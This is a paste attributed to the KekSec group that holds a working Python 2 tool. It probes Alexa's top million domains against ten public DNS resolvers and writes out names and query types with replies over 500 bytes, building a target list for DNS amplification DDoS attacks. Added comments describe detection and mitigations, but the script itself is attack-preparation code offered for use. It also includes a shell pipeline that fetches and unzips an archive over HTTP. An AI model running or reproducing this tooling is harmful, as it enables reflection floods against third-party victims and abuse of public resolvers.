KekSec

DNS AMP PACKET GENERATOR (parse alexa top 1m) [UPDATED]

Jan 12th, 2021 (edited)
  1. #this program will parse Alexa's top 1 million domains for responses larger than 500 bytes. It tests every type of query available on 10 of the fastest DNS servers on the planet.
  2. #enjoy. FUCK RFC 8482 !!!
  3. #coded by Freak @ Kek Security
  4. #pip2 install dnslib
  5. #updated at 1.12.2021 added multithreading for faster list generation
  6. import socket,os,random,select,time,threading
  7. from dnslib import DNSRecord
  8. #qtypes = {'a': '\x01', 'txt' : '\x10', 'cname' : '\x05', 'ns' : '\x02', 'mx' : '\x0f', 'ptr' : '\x0c', 'any' : '\xff', 'axfr' : '\xfc', 'soa' : '\x06', 'HINFO' : '\r'}
def make_dns_query_domain(domain):
    """Encode a dotted name as a run of length-prefixed DNS labels.

    Each dot-separated piece becomes one length character followed by the
    piece itself.  The terminating zero-length root label is NOT appended
    here; the caller adds it.  Label length is not validated against the
    DNS limit of 63.
    """
    encoded_labels = []
    for label in domain.split('.'):
        encoded_labels.append(chr(len(label)) + label)
    return ''.join(encoded_labels)
def make_dns_request_data(dns_query, qtype):
    """Assemble a single-question DNS query message (Python 2 byte strings).

    Layout, as written by the literals below:
      * 2 random bytes from os.urandom as the transaction ID
      * flags 0x0100 (recursion desired), QDCOUNT 1, and zero answer,
        authority and additional counts
      * the already label-encoded name in ``dns_query``
      * a zero byte closing the name, then a 16-bit type whose high byte is
        zero and whose low byte is ``qtype``, then class 0x0001 (IN)
    """
    transaction_id = os.urandom(2)
    header = transaction_id + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
    question_tail = '\x00\x00' + qtype + '\x00\x01'
    return header + dns_query + question_tail
# Optional setup step (Python 2 raw_input): on a "y" answer a shell pipeline
# fetches the Alexa top-1m archive, unzips it and writes the second CSV column
# (the domain) to top1m.txt.
# NOTE(review): the archive is fetched over plain HTTP with no integrity check
# and is handed straight to unzip/awk through a shell; treat this as untrusted
# input if the script is ever run in an analysis sandbox.
# Host artifacts left in the working directory: top-1m.csv.zip, top-1m.csv,
# top1m.txt.
if raw_input("Download domain list? (y/n): ").lower().startswith("y"):
    os.popen("wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv>top1m.txt")
# One candidate name per line; carriage returns are stripped before splitting.
domains=open("top1m.txt","r").read().replace("\r", "").split("\n")
# Hard-coded resolver addresses. getdata() picks one at random per query, so
# these ten hosts (UDP port 53) are the only destinations the probes go to.
servers=["1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4", "8.26.56.26", "8.20.247.20", "9.9.9.9", "149.112.112.112", "64.6.64.6", "64.6.65.6"]
# Unused in the visible code: the only reference is a commented-out append
# inside getdata().
responses=[]
# "global" at module level has no effect; the name is module-global anyway.
global running
# Count of getdata() workers currently in flight, read by the dispatch loop.
running = 0
def stringproc(s):
    """Render every character of ``s`` as a textual escape sequence.

    Code points up to 255 become a backslash-x escape with two hex digits;
    anything larger becomes a backslash-u escape with at least four hex
    digits.  The result is plain printable text, which is how the qtype byte
    ends up readable in the output file.
    """
    escaped = []
    for char in s:
        code_point = ord(char)
        if code_point > 255:
            escaped.append('\\u%04x' % code_point)
        else:
            escaped.append('\\x%02x' % code_point)
    return ''.join(escaped)
# Result file, truncated on every run and never closed in the visible code.
# getdata() appends one "['<escaped qtype>','<name>']," entry per reply longer
# than 500 bytes. For an analyst, queries.txt in this format next to top1m.txt
# is a host artifact of this script having been run.
fh=open("queries.txt","w")
def getdata(qname,fh):
    """Worker thread body: probe one name with ten query types and log large replies.

    For each query-type byte, one UDP query for ``qname`` is sent to a resolver
    chosen at random from the module-level ``servers`` list, and the function
    waits up to 0.3 s for a reply.  A reply longer than 500 bytes is printed
    (query and response parsed with dnslib) and the escaped qtype plus the name
    are appended to ``fh``.

    Defender notes:
      * The socket is an ordinary UDP socket, so the probes leave from the
        host's own address; nothing in this function forges a source address.
        What the script produces is a list of (qtype, name) pairs with large
        answers.
      * On the wire this looks like one client asking for A, TXT, CNAME, NS,
        MX, PTR, ANY, AXFR, SOA and HINFO for the same name in quick
        succession, name after name from a popularity list.  ANY and
        AXFR-over-UDP queries for unrelated third-party names are uncommon in
        normal client traffic and make a usable detection signal.
      * Zone operators keep their names out of such lists by keeping answers
        small: minimal ANY responses (RFC 8482), trimming oversized TXT/record
        sets, and response rate limiting on authoritative servers.  Abuse of
        large answers depends on spoofed sources, which source-address
        validation (BCP 38) at the network edge prevents.
    """
    global running
    # Mark this worker as in flight; the dispatch loop throttles on this count.
    running += 1
    # Query-type bytes, per the commented-out legend near the imports:
    # 0x01 A, 0x10 TXT, 0x05 CNAME, 0x02 NS, 0x0f MX, 0x0c PTR, 0xff ANY,
    # 0xfc AXFR, 0x06 SOA, '\r' (0x0d) HINFO.
    for qtype in ['\x01', '\x10', '\x05','\x02', '\x0f', '\x0c', '\xff', '\xfc', '\x06','\r']:
        try:
            forward_addr = (random.choice(servers), 53) # dns and port
            # A fresh non-blocking UDP socket is created for every query.
            client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            client.setblocking(0)
            dnspkt=make_dns_request_data(make_dns_query_domain(qname), qtype)
            client.sendto(dnspkt, forward_addr)
            # Wait at most 0.3 s for the socket to become readable.
            ready = select.select([client], [], [], 0.3)
            if ready[0]:
                # The buffer-size argument (1 GiB) is far larger than any UDP datagram.
                data, _ = client.recvfrom(1024*1024*1024)
                # 500 bytes is the "interesting" threshold named in the header comment.
                if len(data) > 500:
                    print DNSRecord.parse(dnspkt)
                    print DNSRecord.parse(data)
                    print "Response size: " + str(len(data))
#                    responses.append([len(data),qname,qtype])
                    fh.write("['"+stringproc(qtype)+"','"+qname+"'],") #add size here if you'd like
                    fh.flush()
        except:
            # Every exception raised for this qtype is discarded and the loop
            # moves on to the next one.
            pass
    # Worker finished: release its slot in the in-flight count.
    running -= 1
# Dispatch loop: starts one getdata() thread per line of the domain list.
# With up to 512 workers in flight and ten queries per worker, the run shows up
# as a sustained, high-rate stream of UDP/53 queries from a single source to
# the ten resolver addresses in ``servers`` -- a volume and fan-out pattern that
# resolver-side rate limiting and egress monitoring can flag.
for qname in domains:
    try:
        # Throttle: poll every 0.4 s while 512 or more workers are in flight.
        while running >= 512:
            time.sleep(0.4)
        threading.Thread(target=getdata,args=(qname,fh,)).start()
    except KeyboardInterrupt:
        # Ctrl-C: send signal 9 to our own PID, ending the process immediately
        # without waiting for worker threads.
        os.kill(os.getpid(),9)
  61.  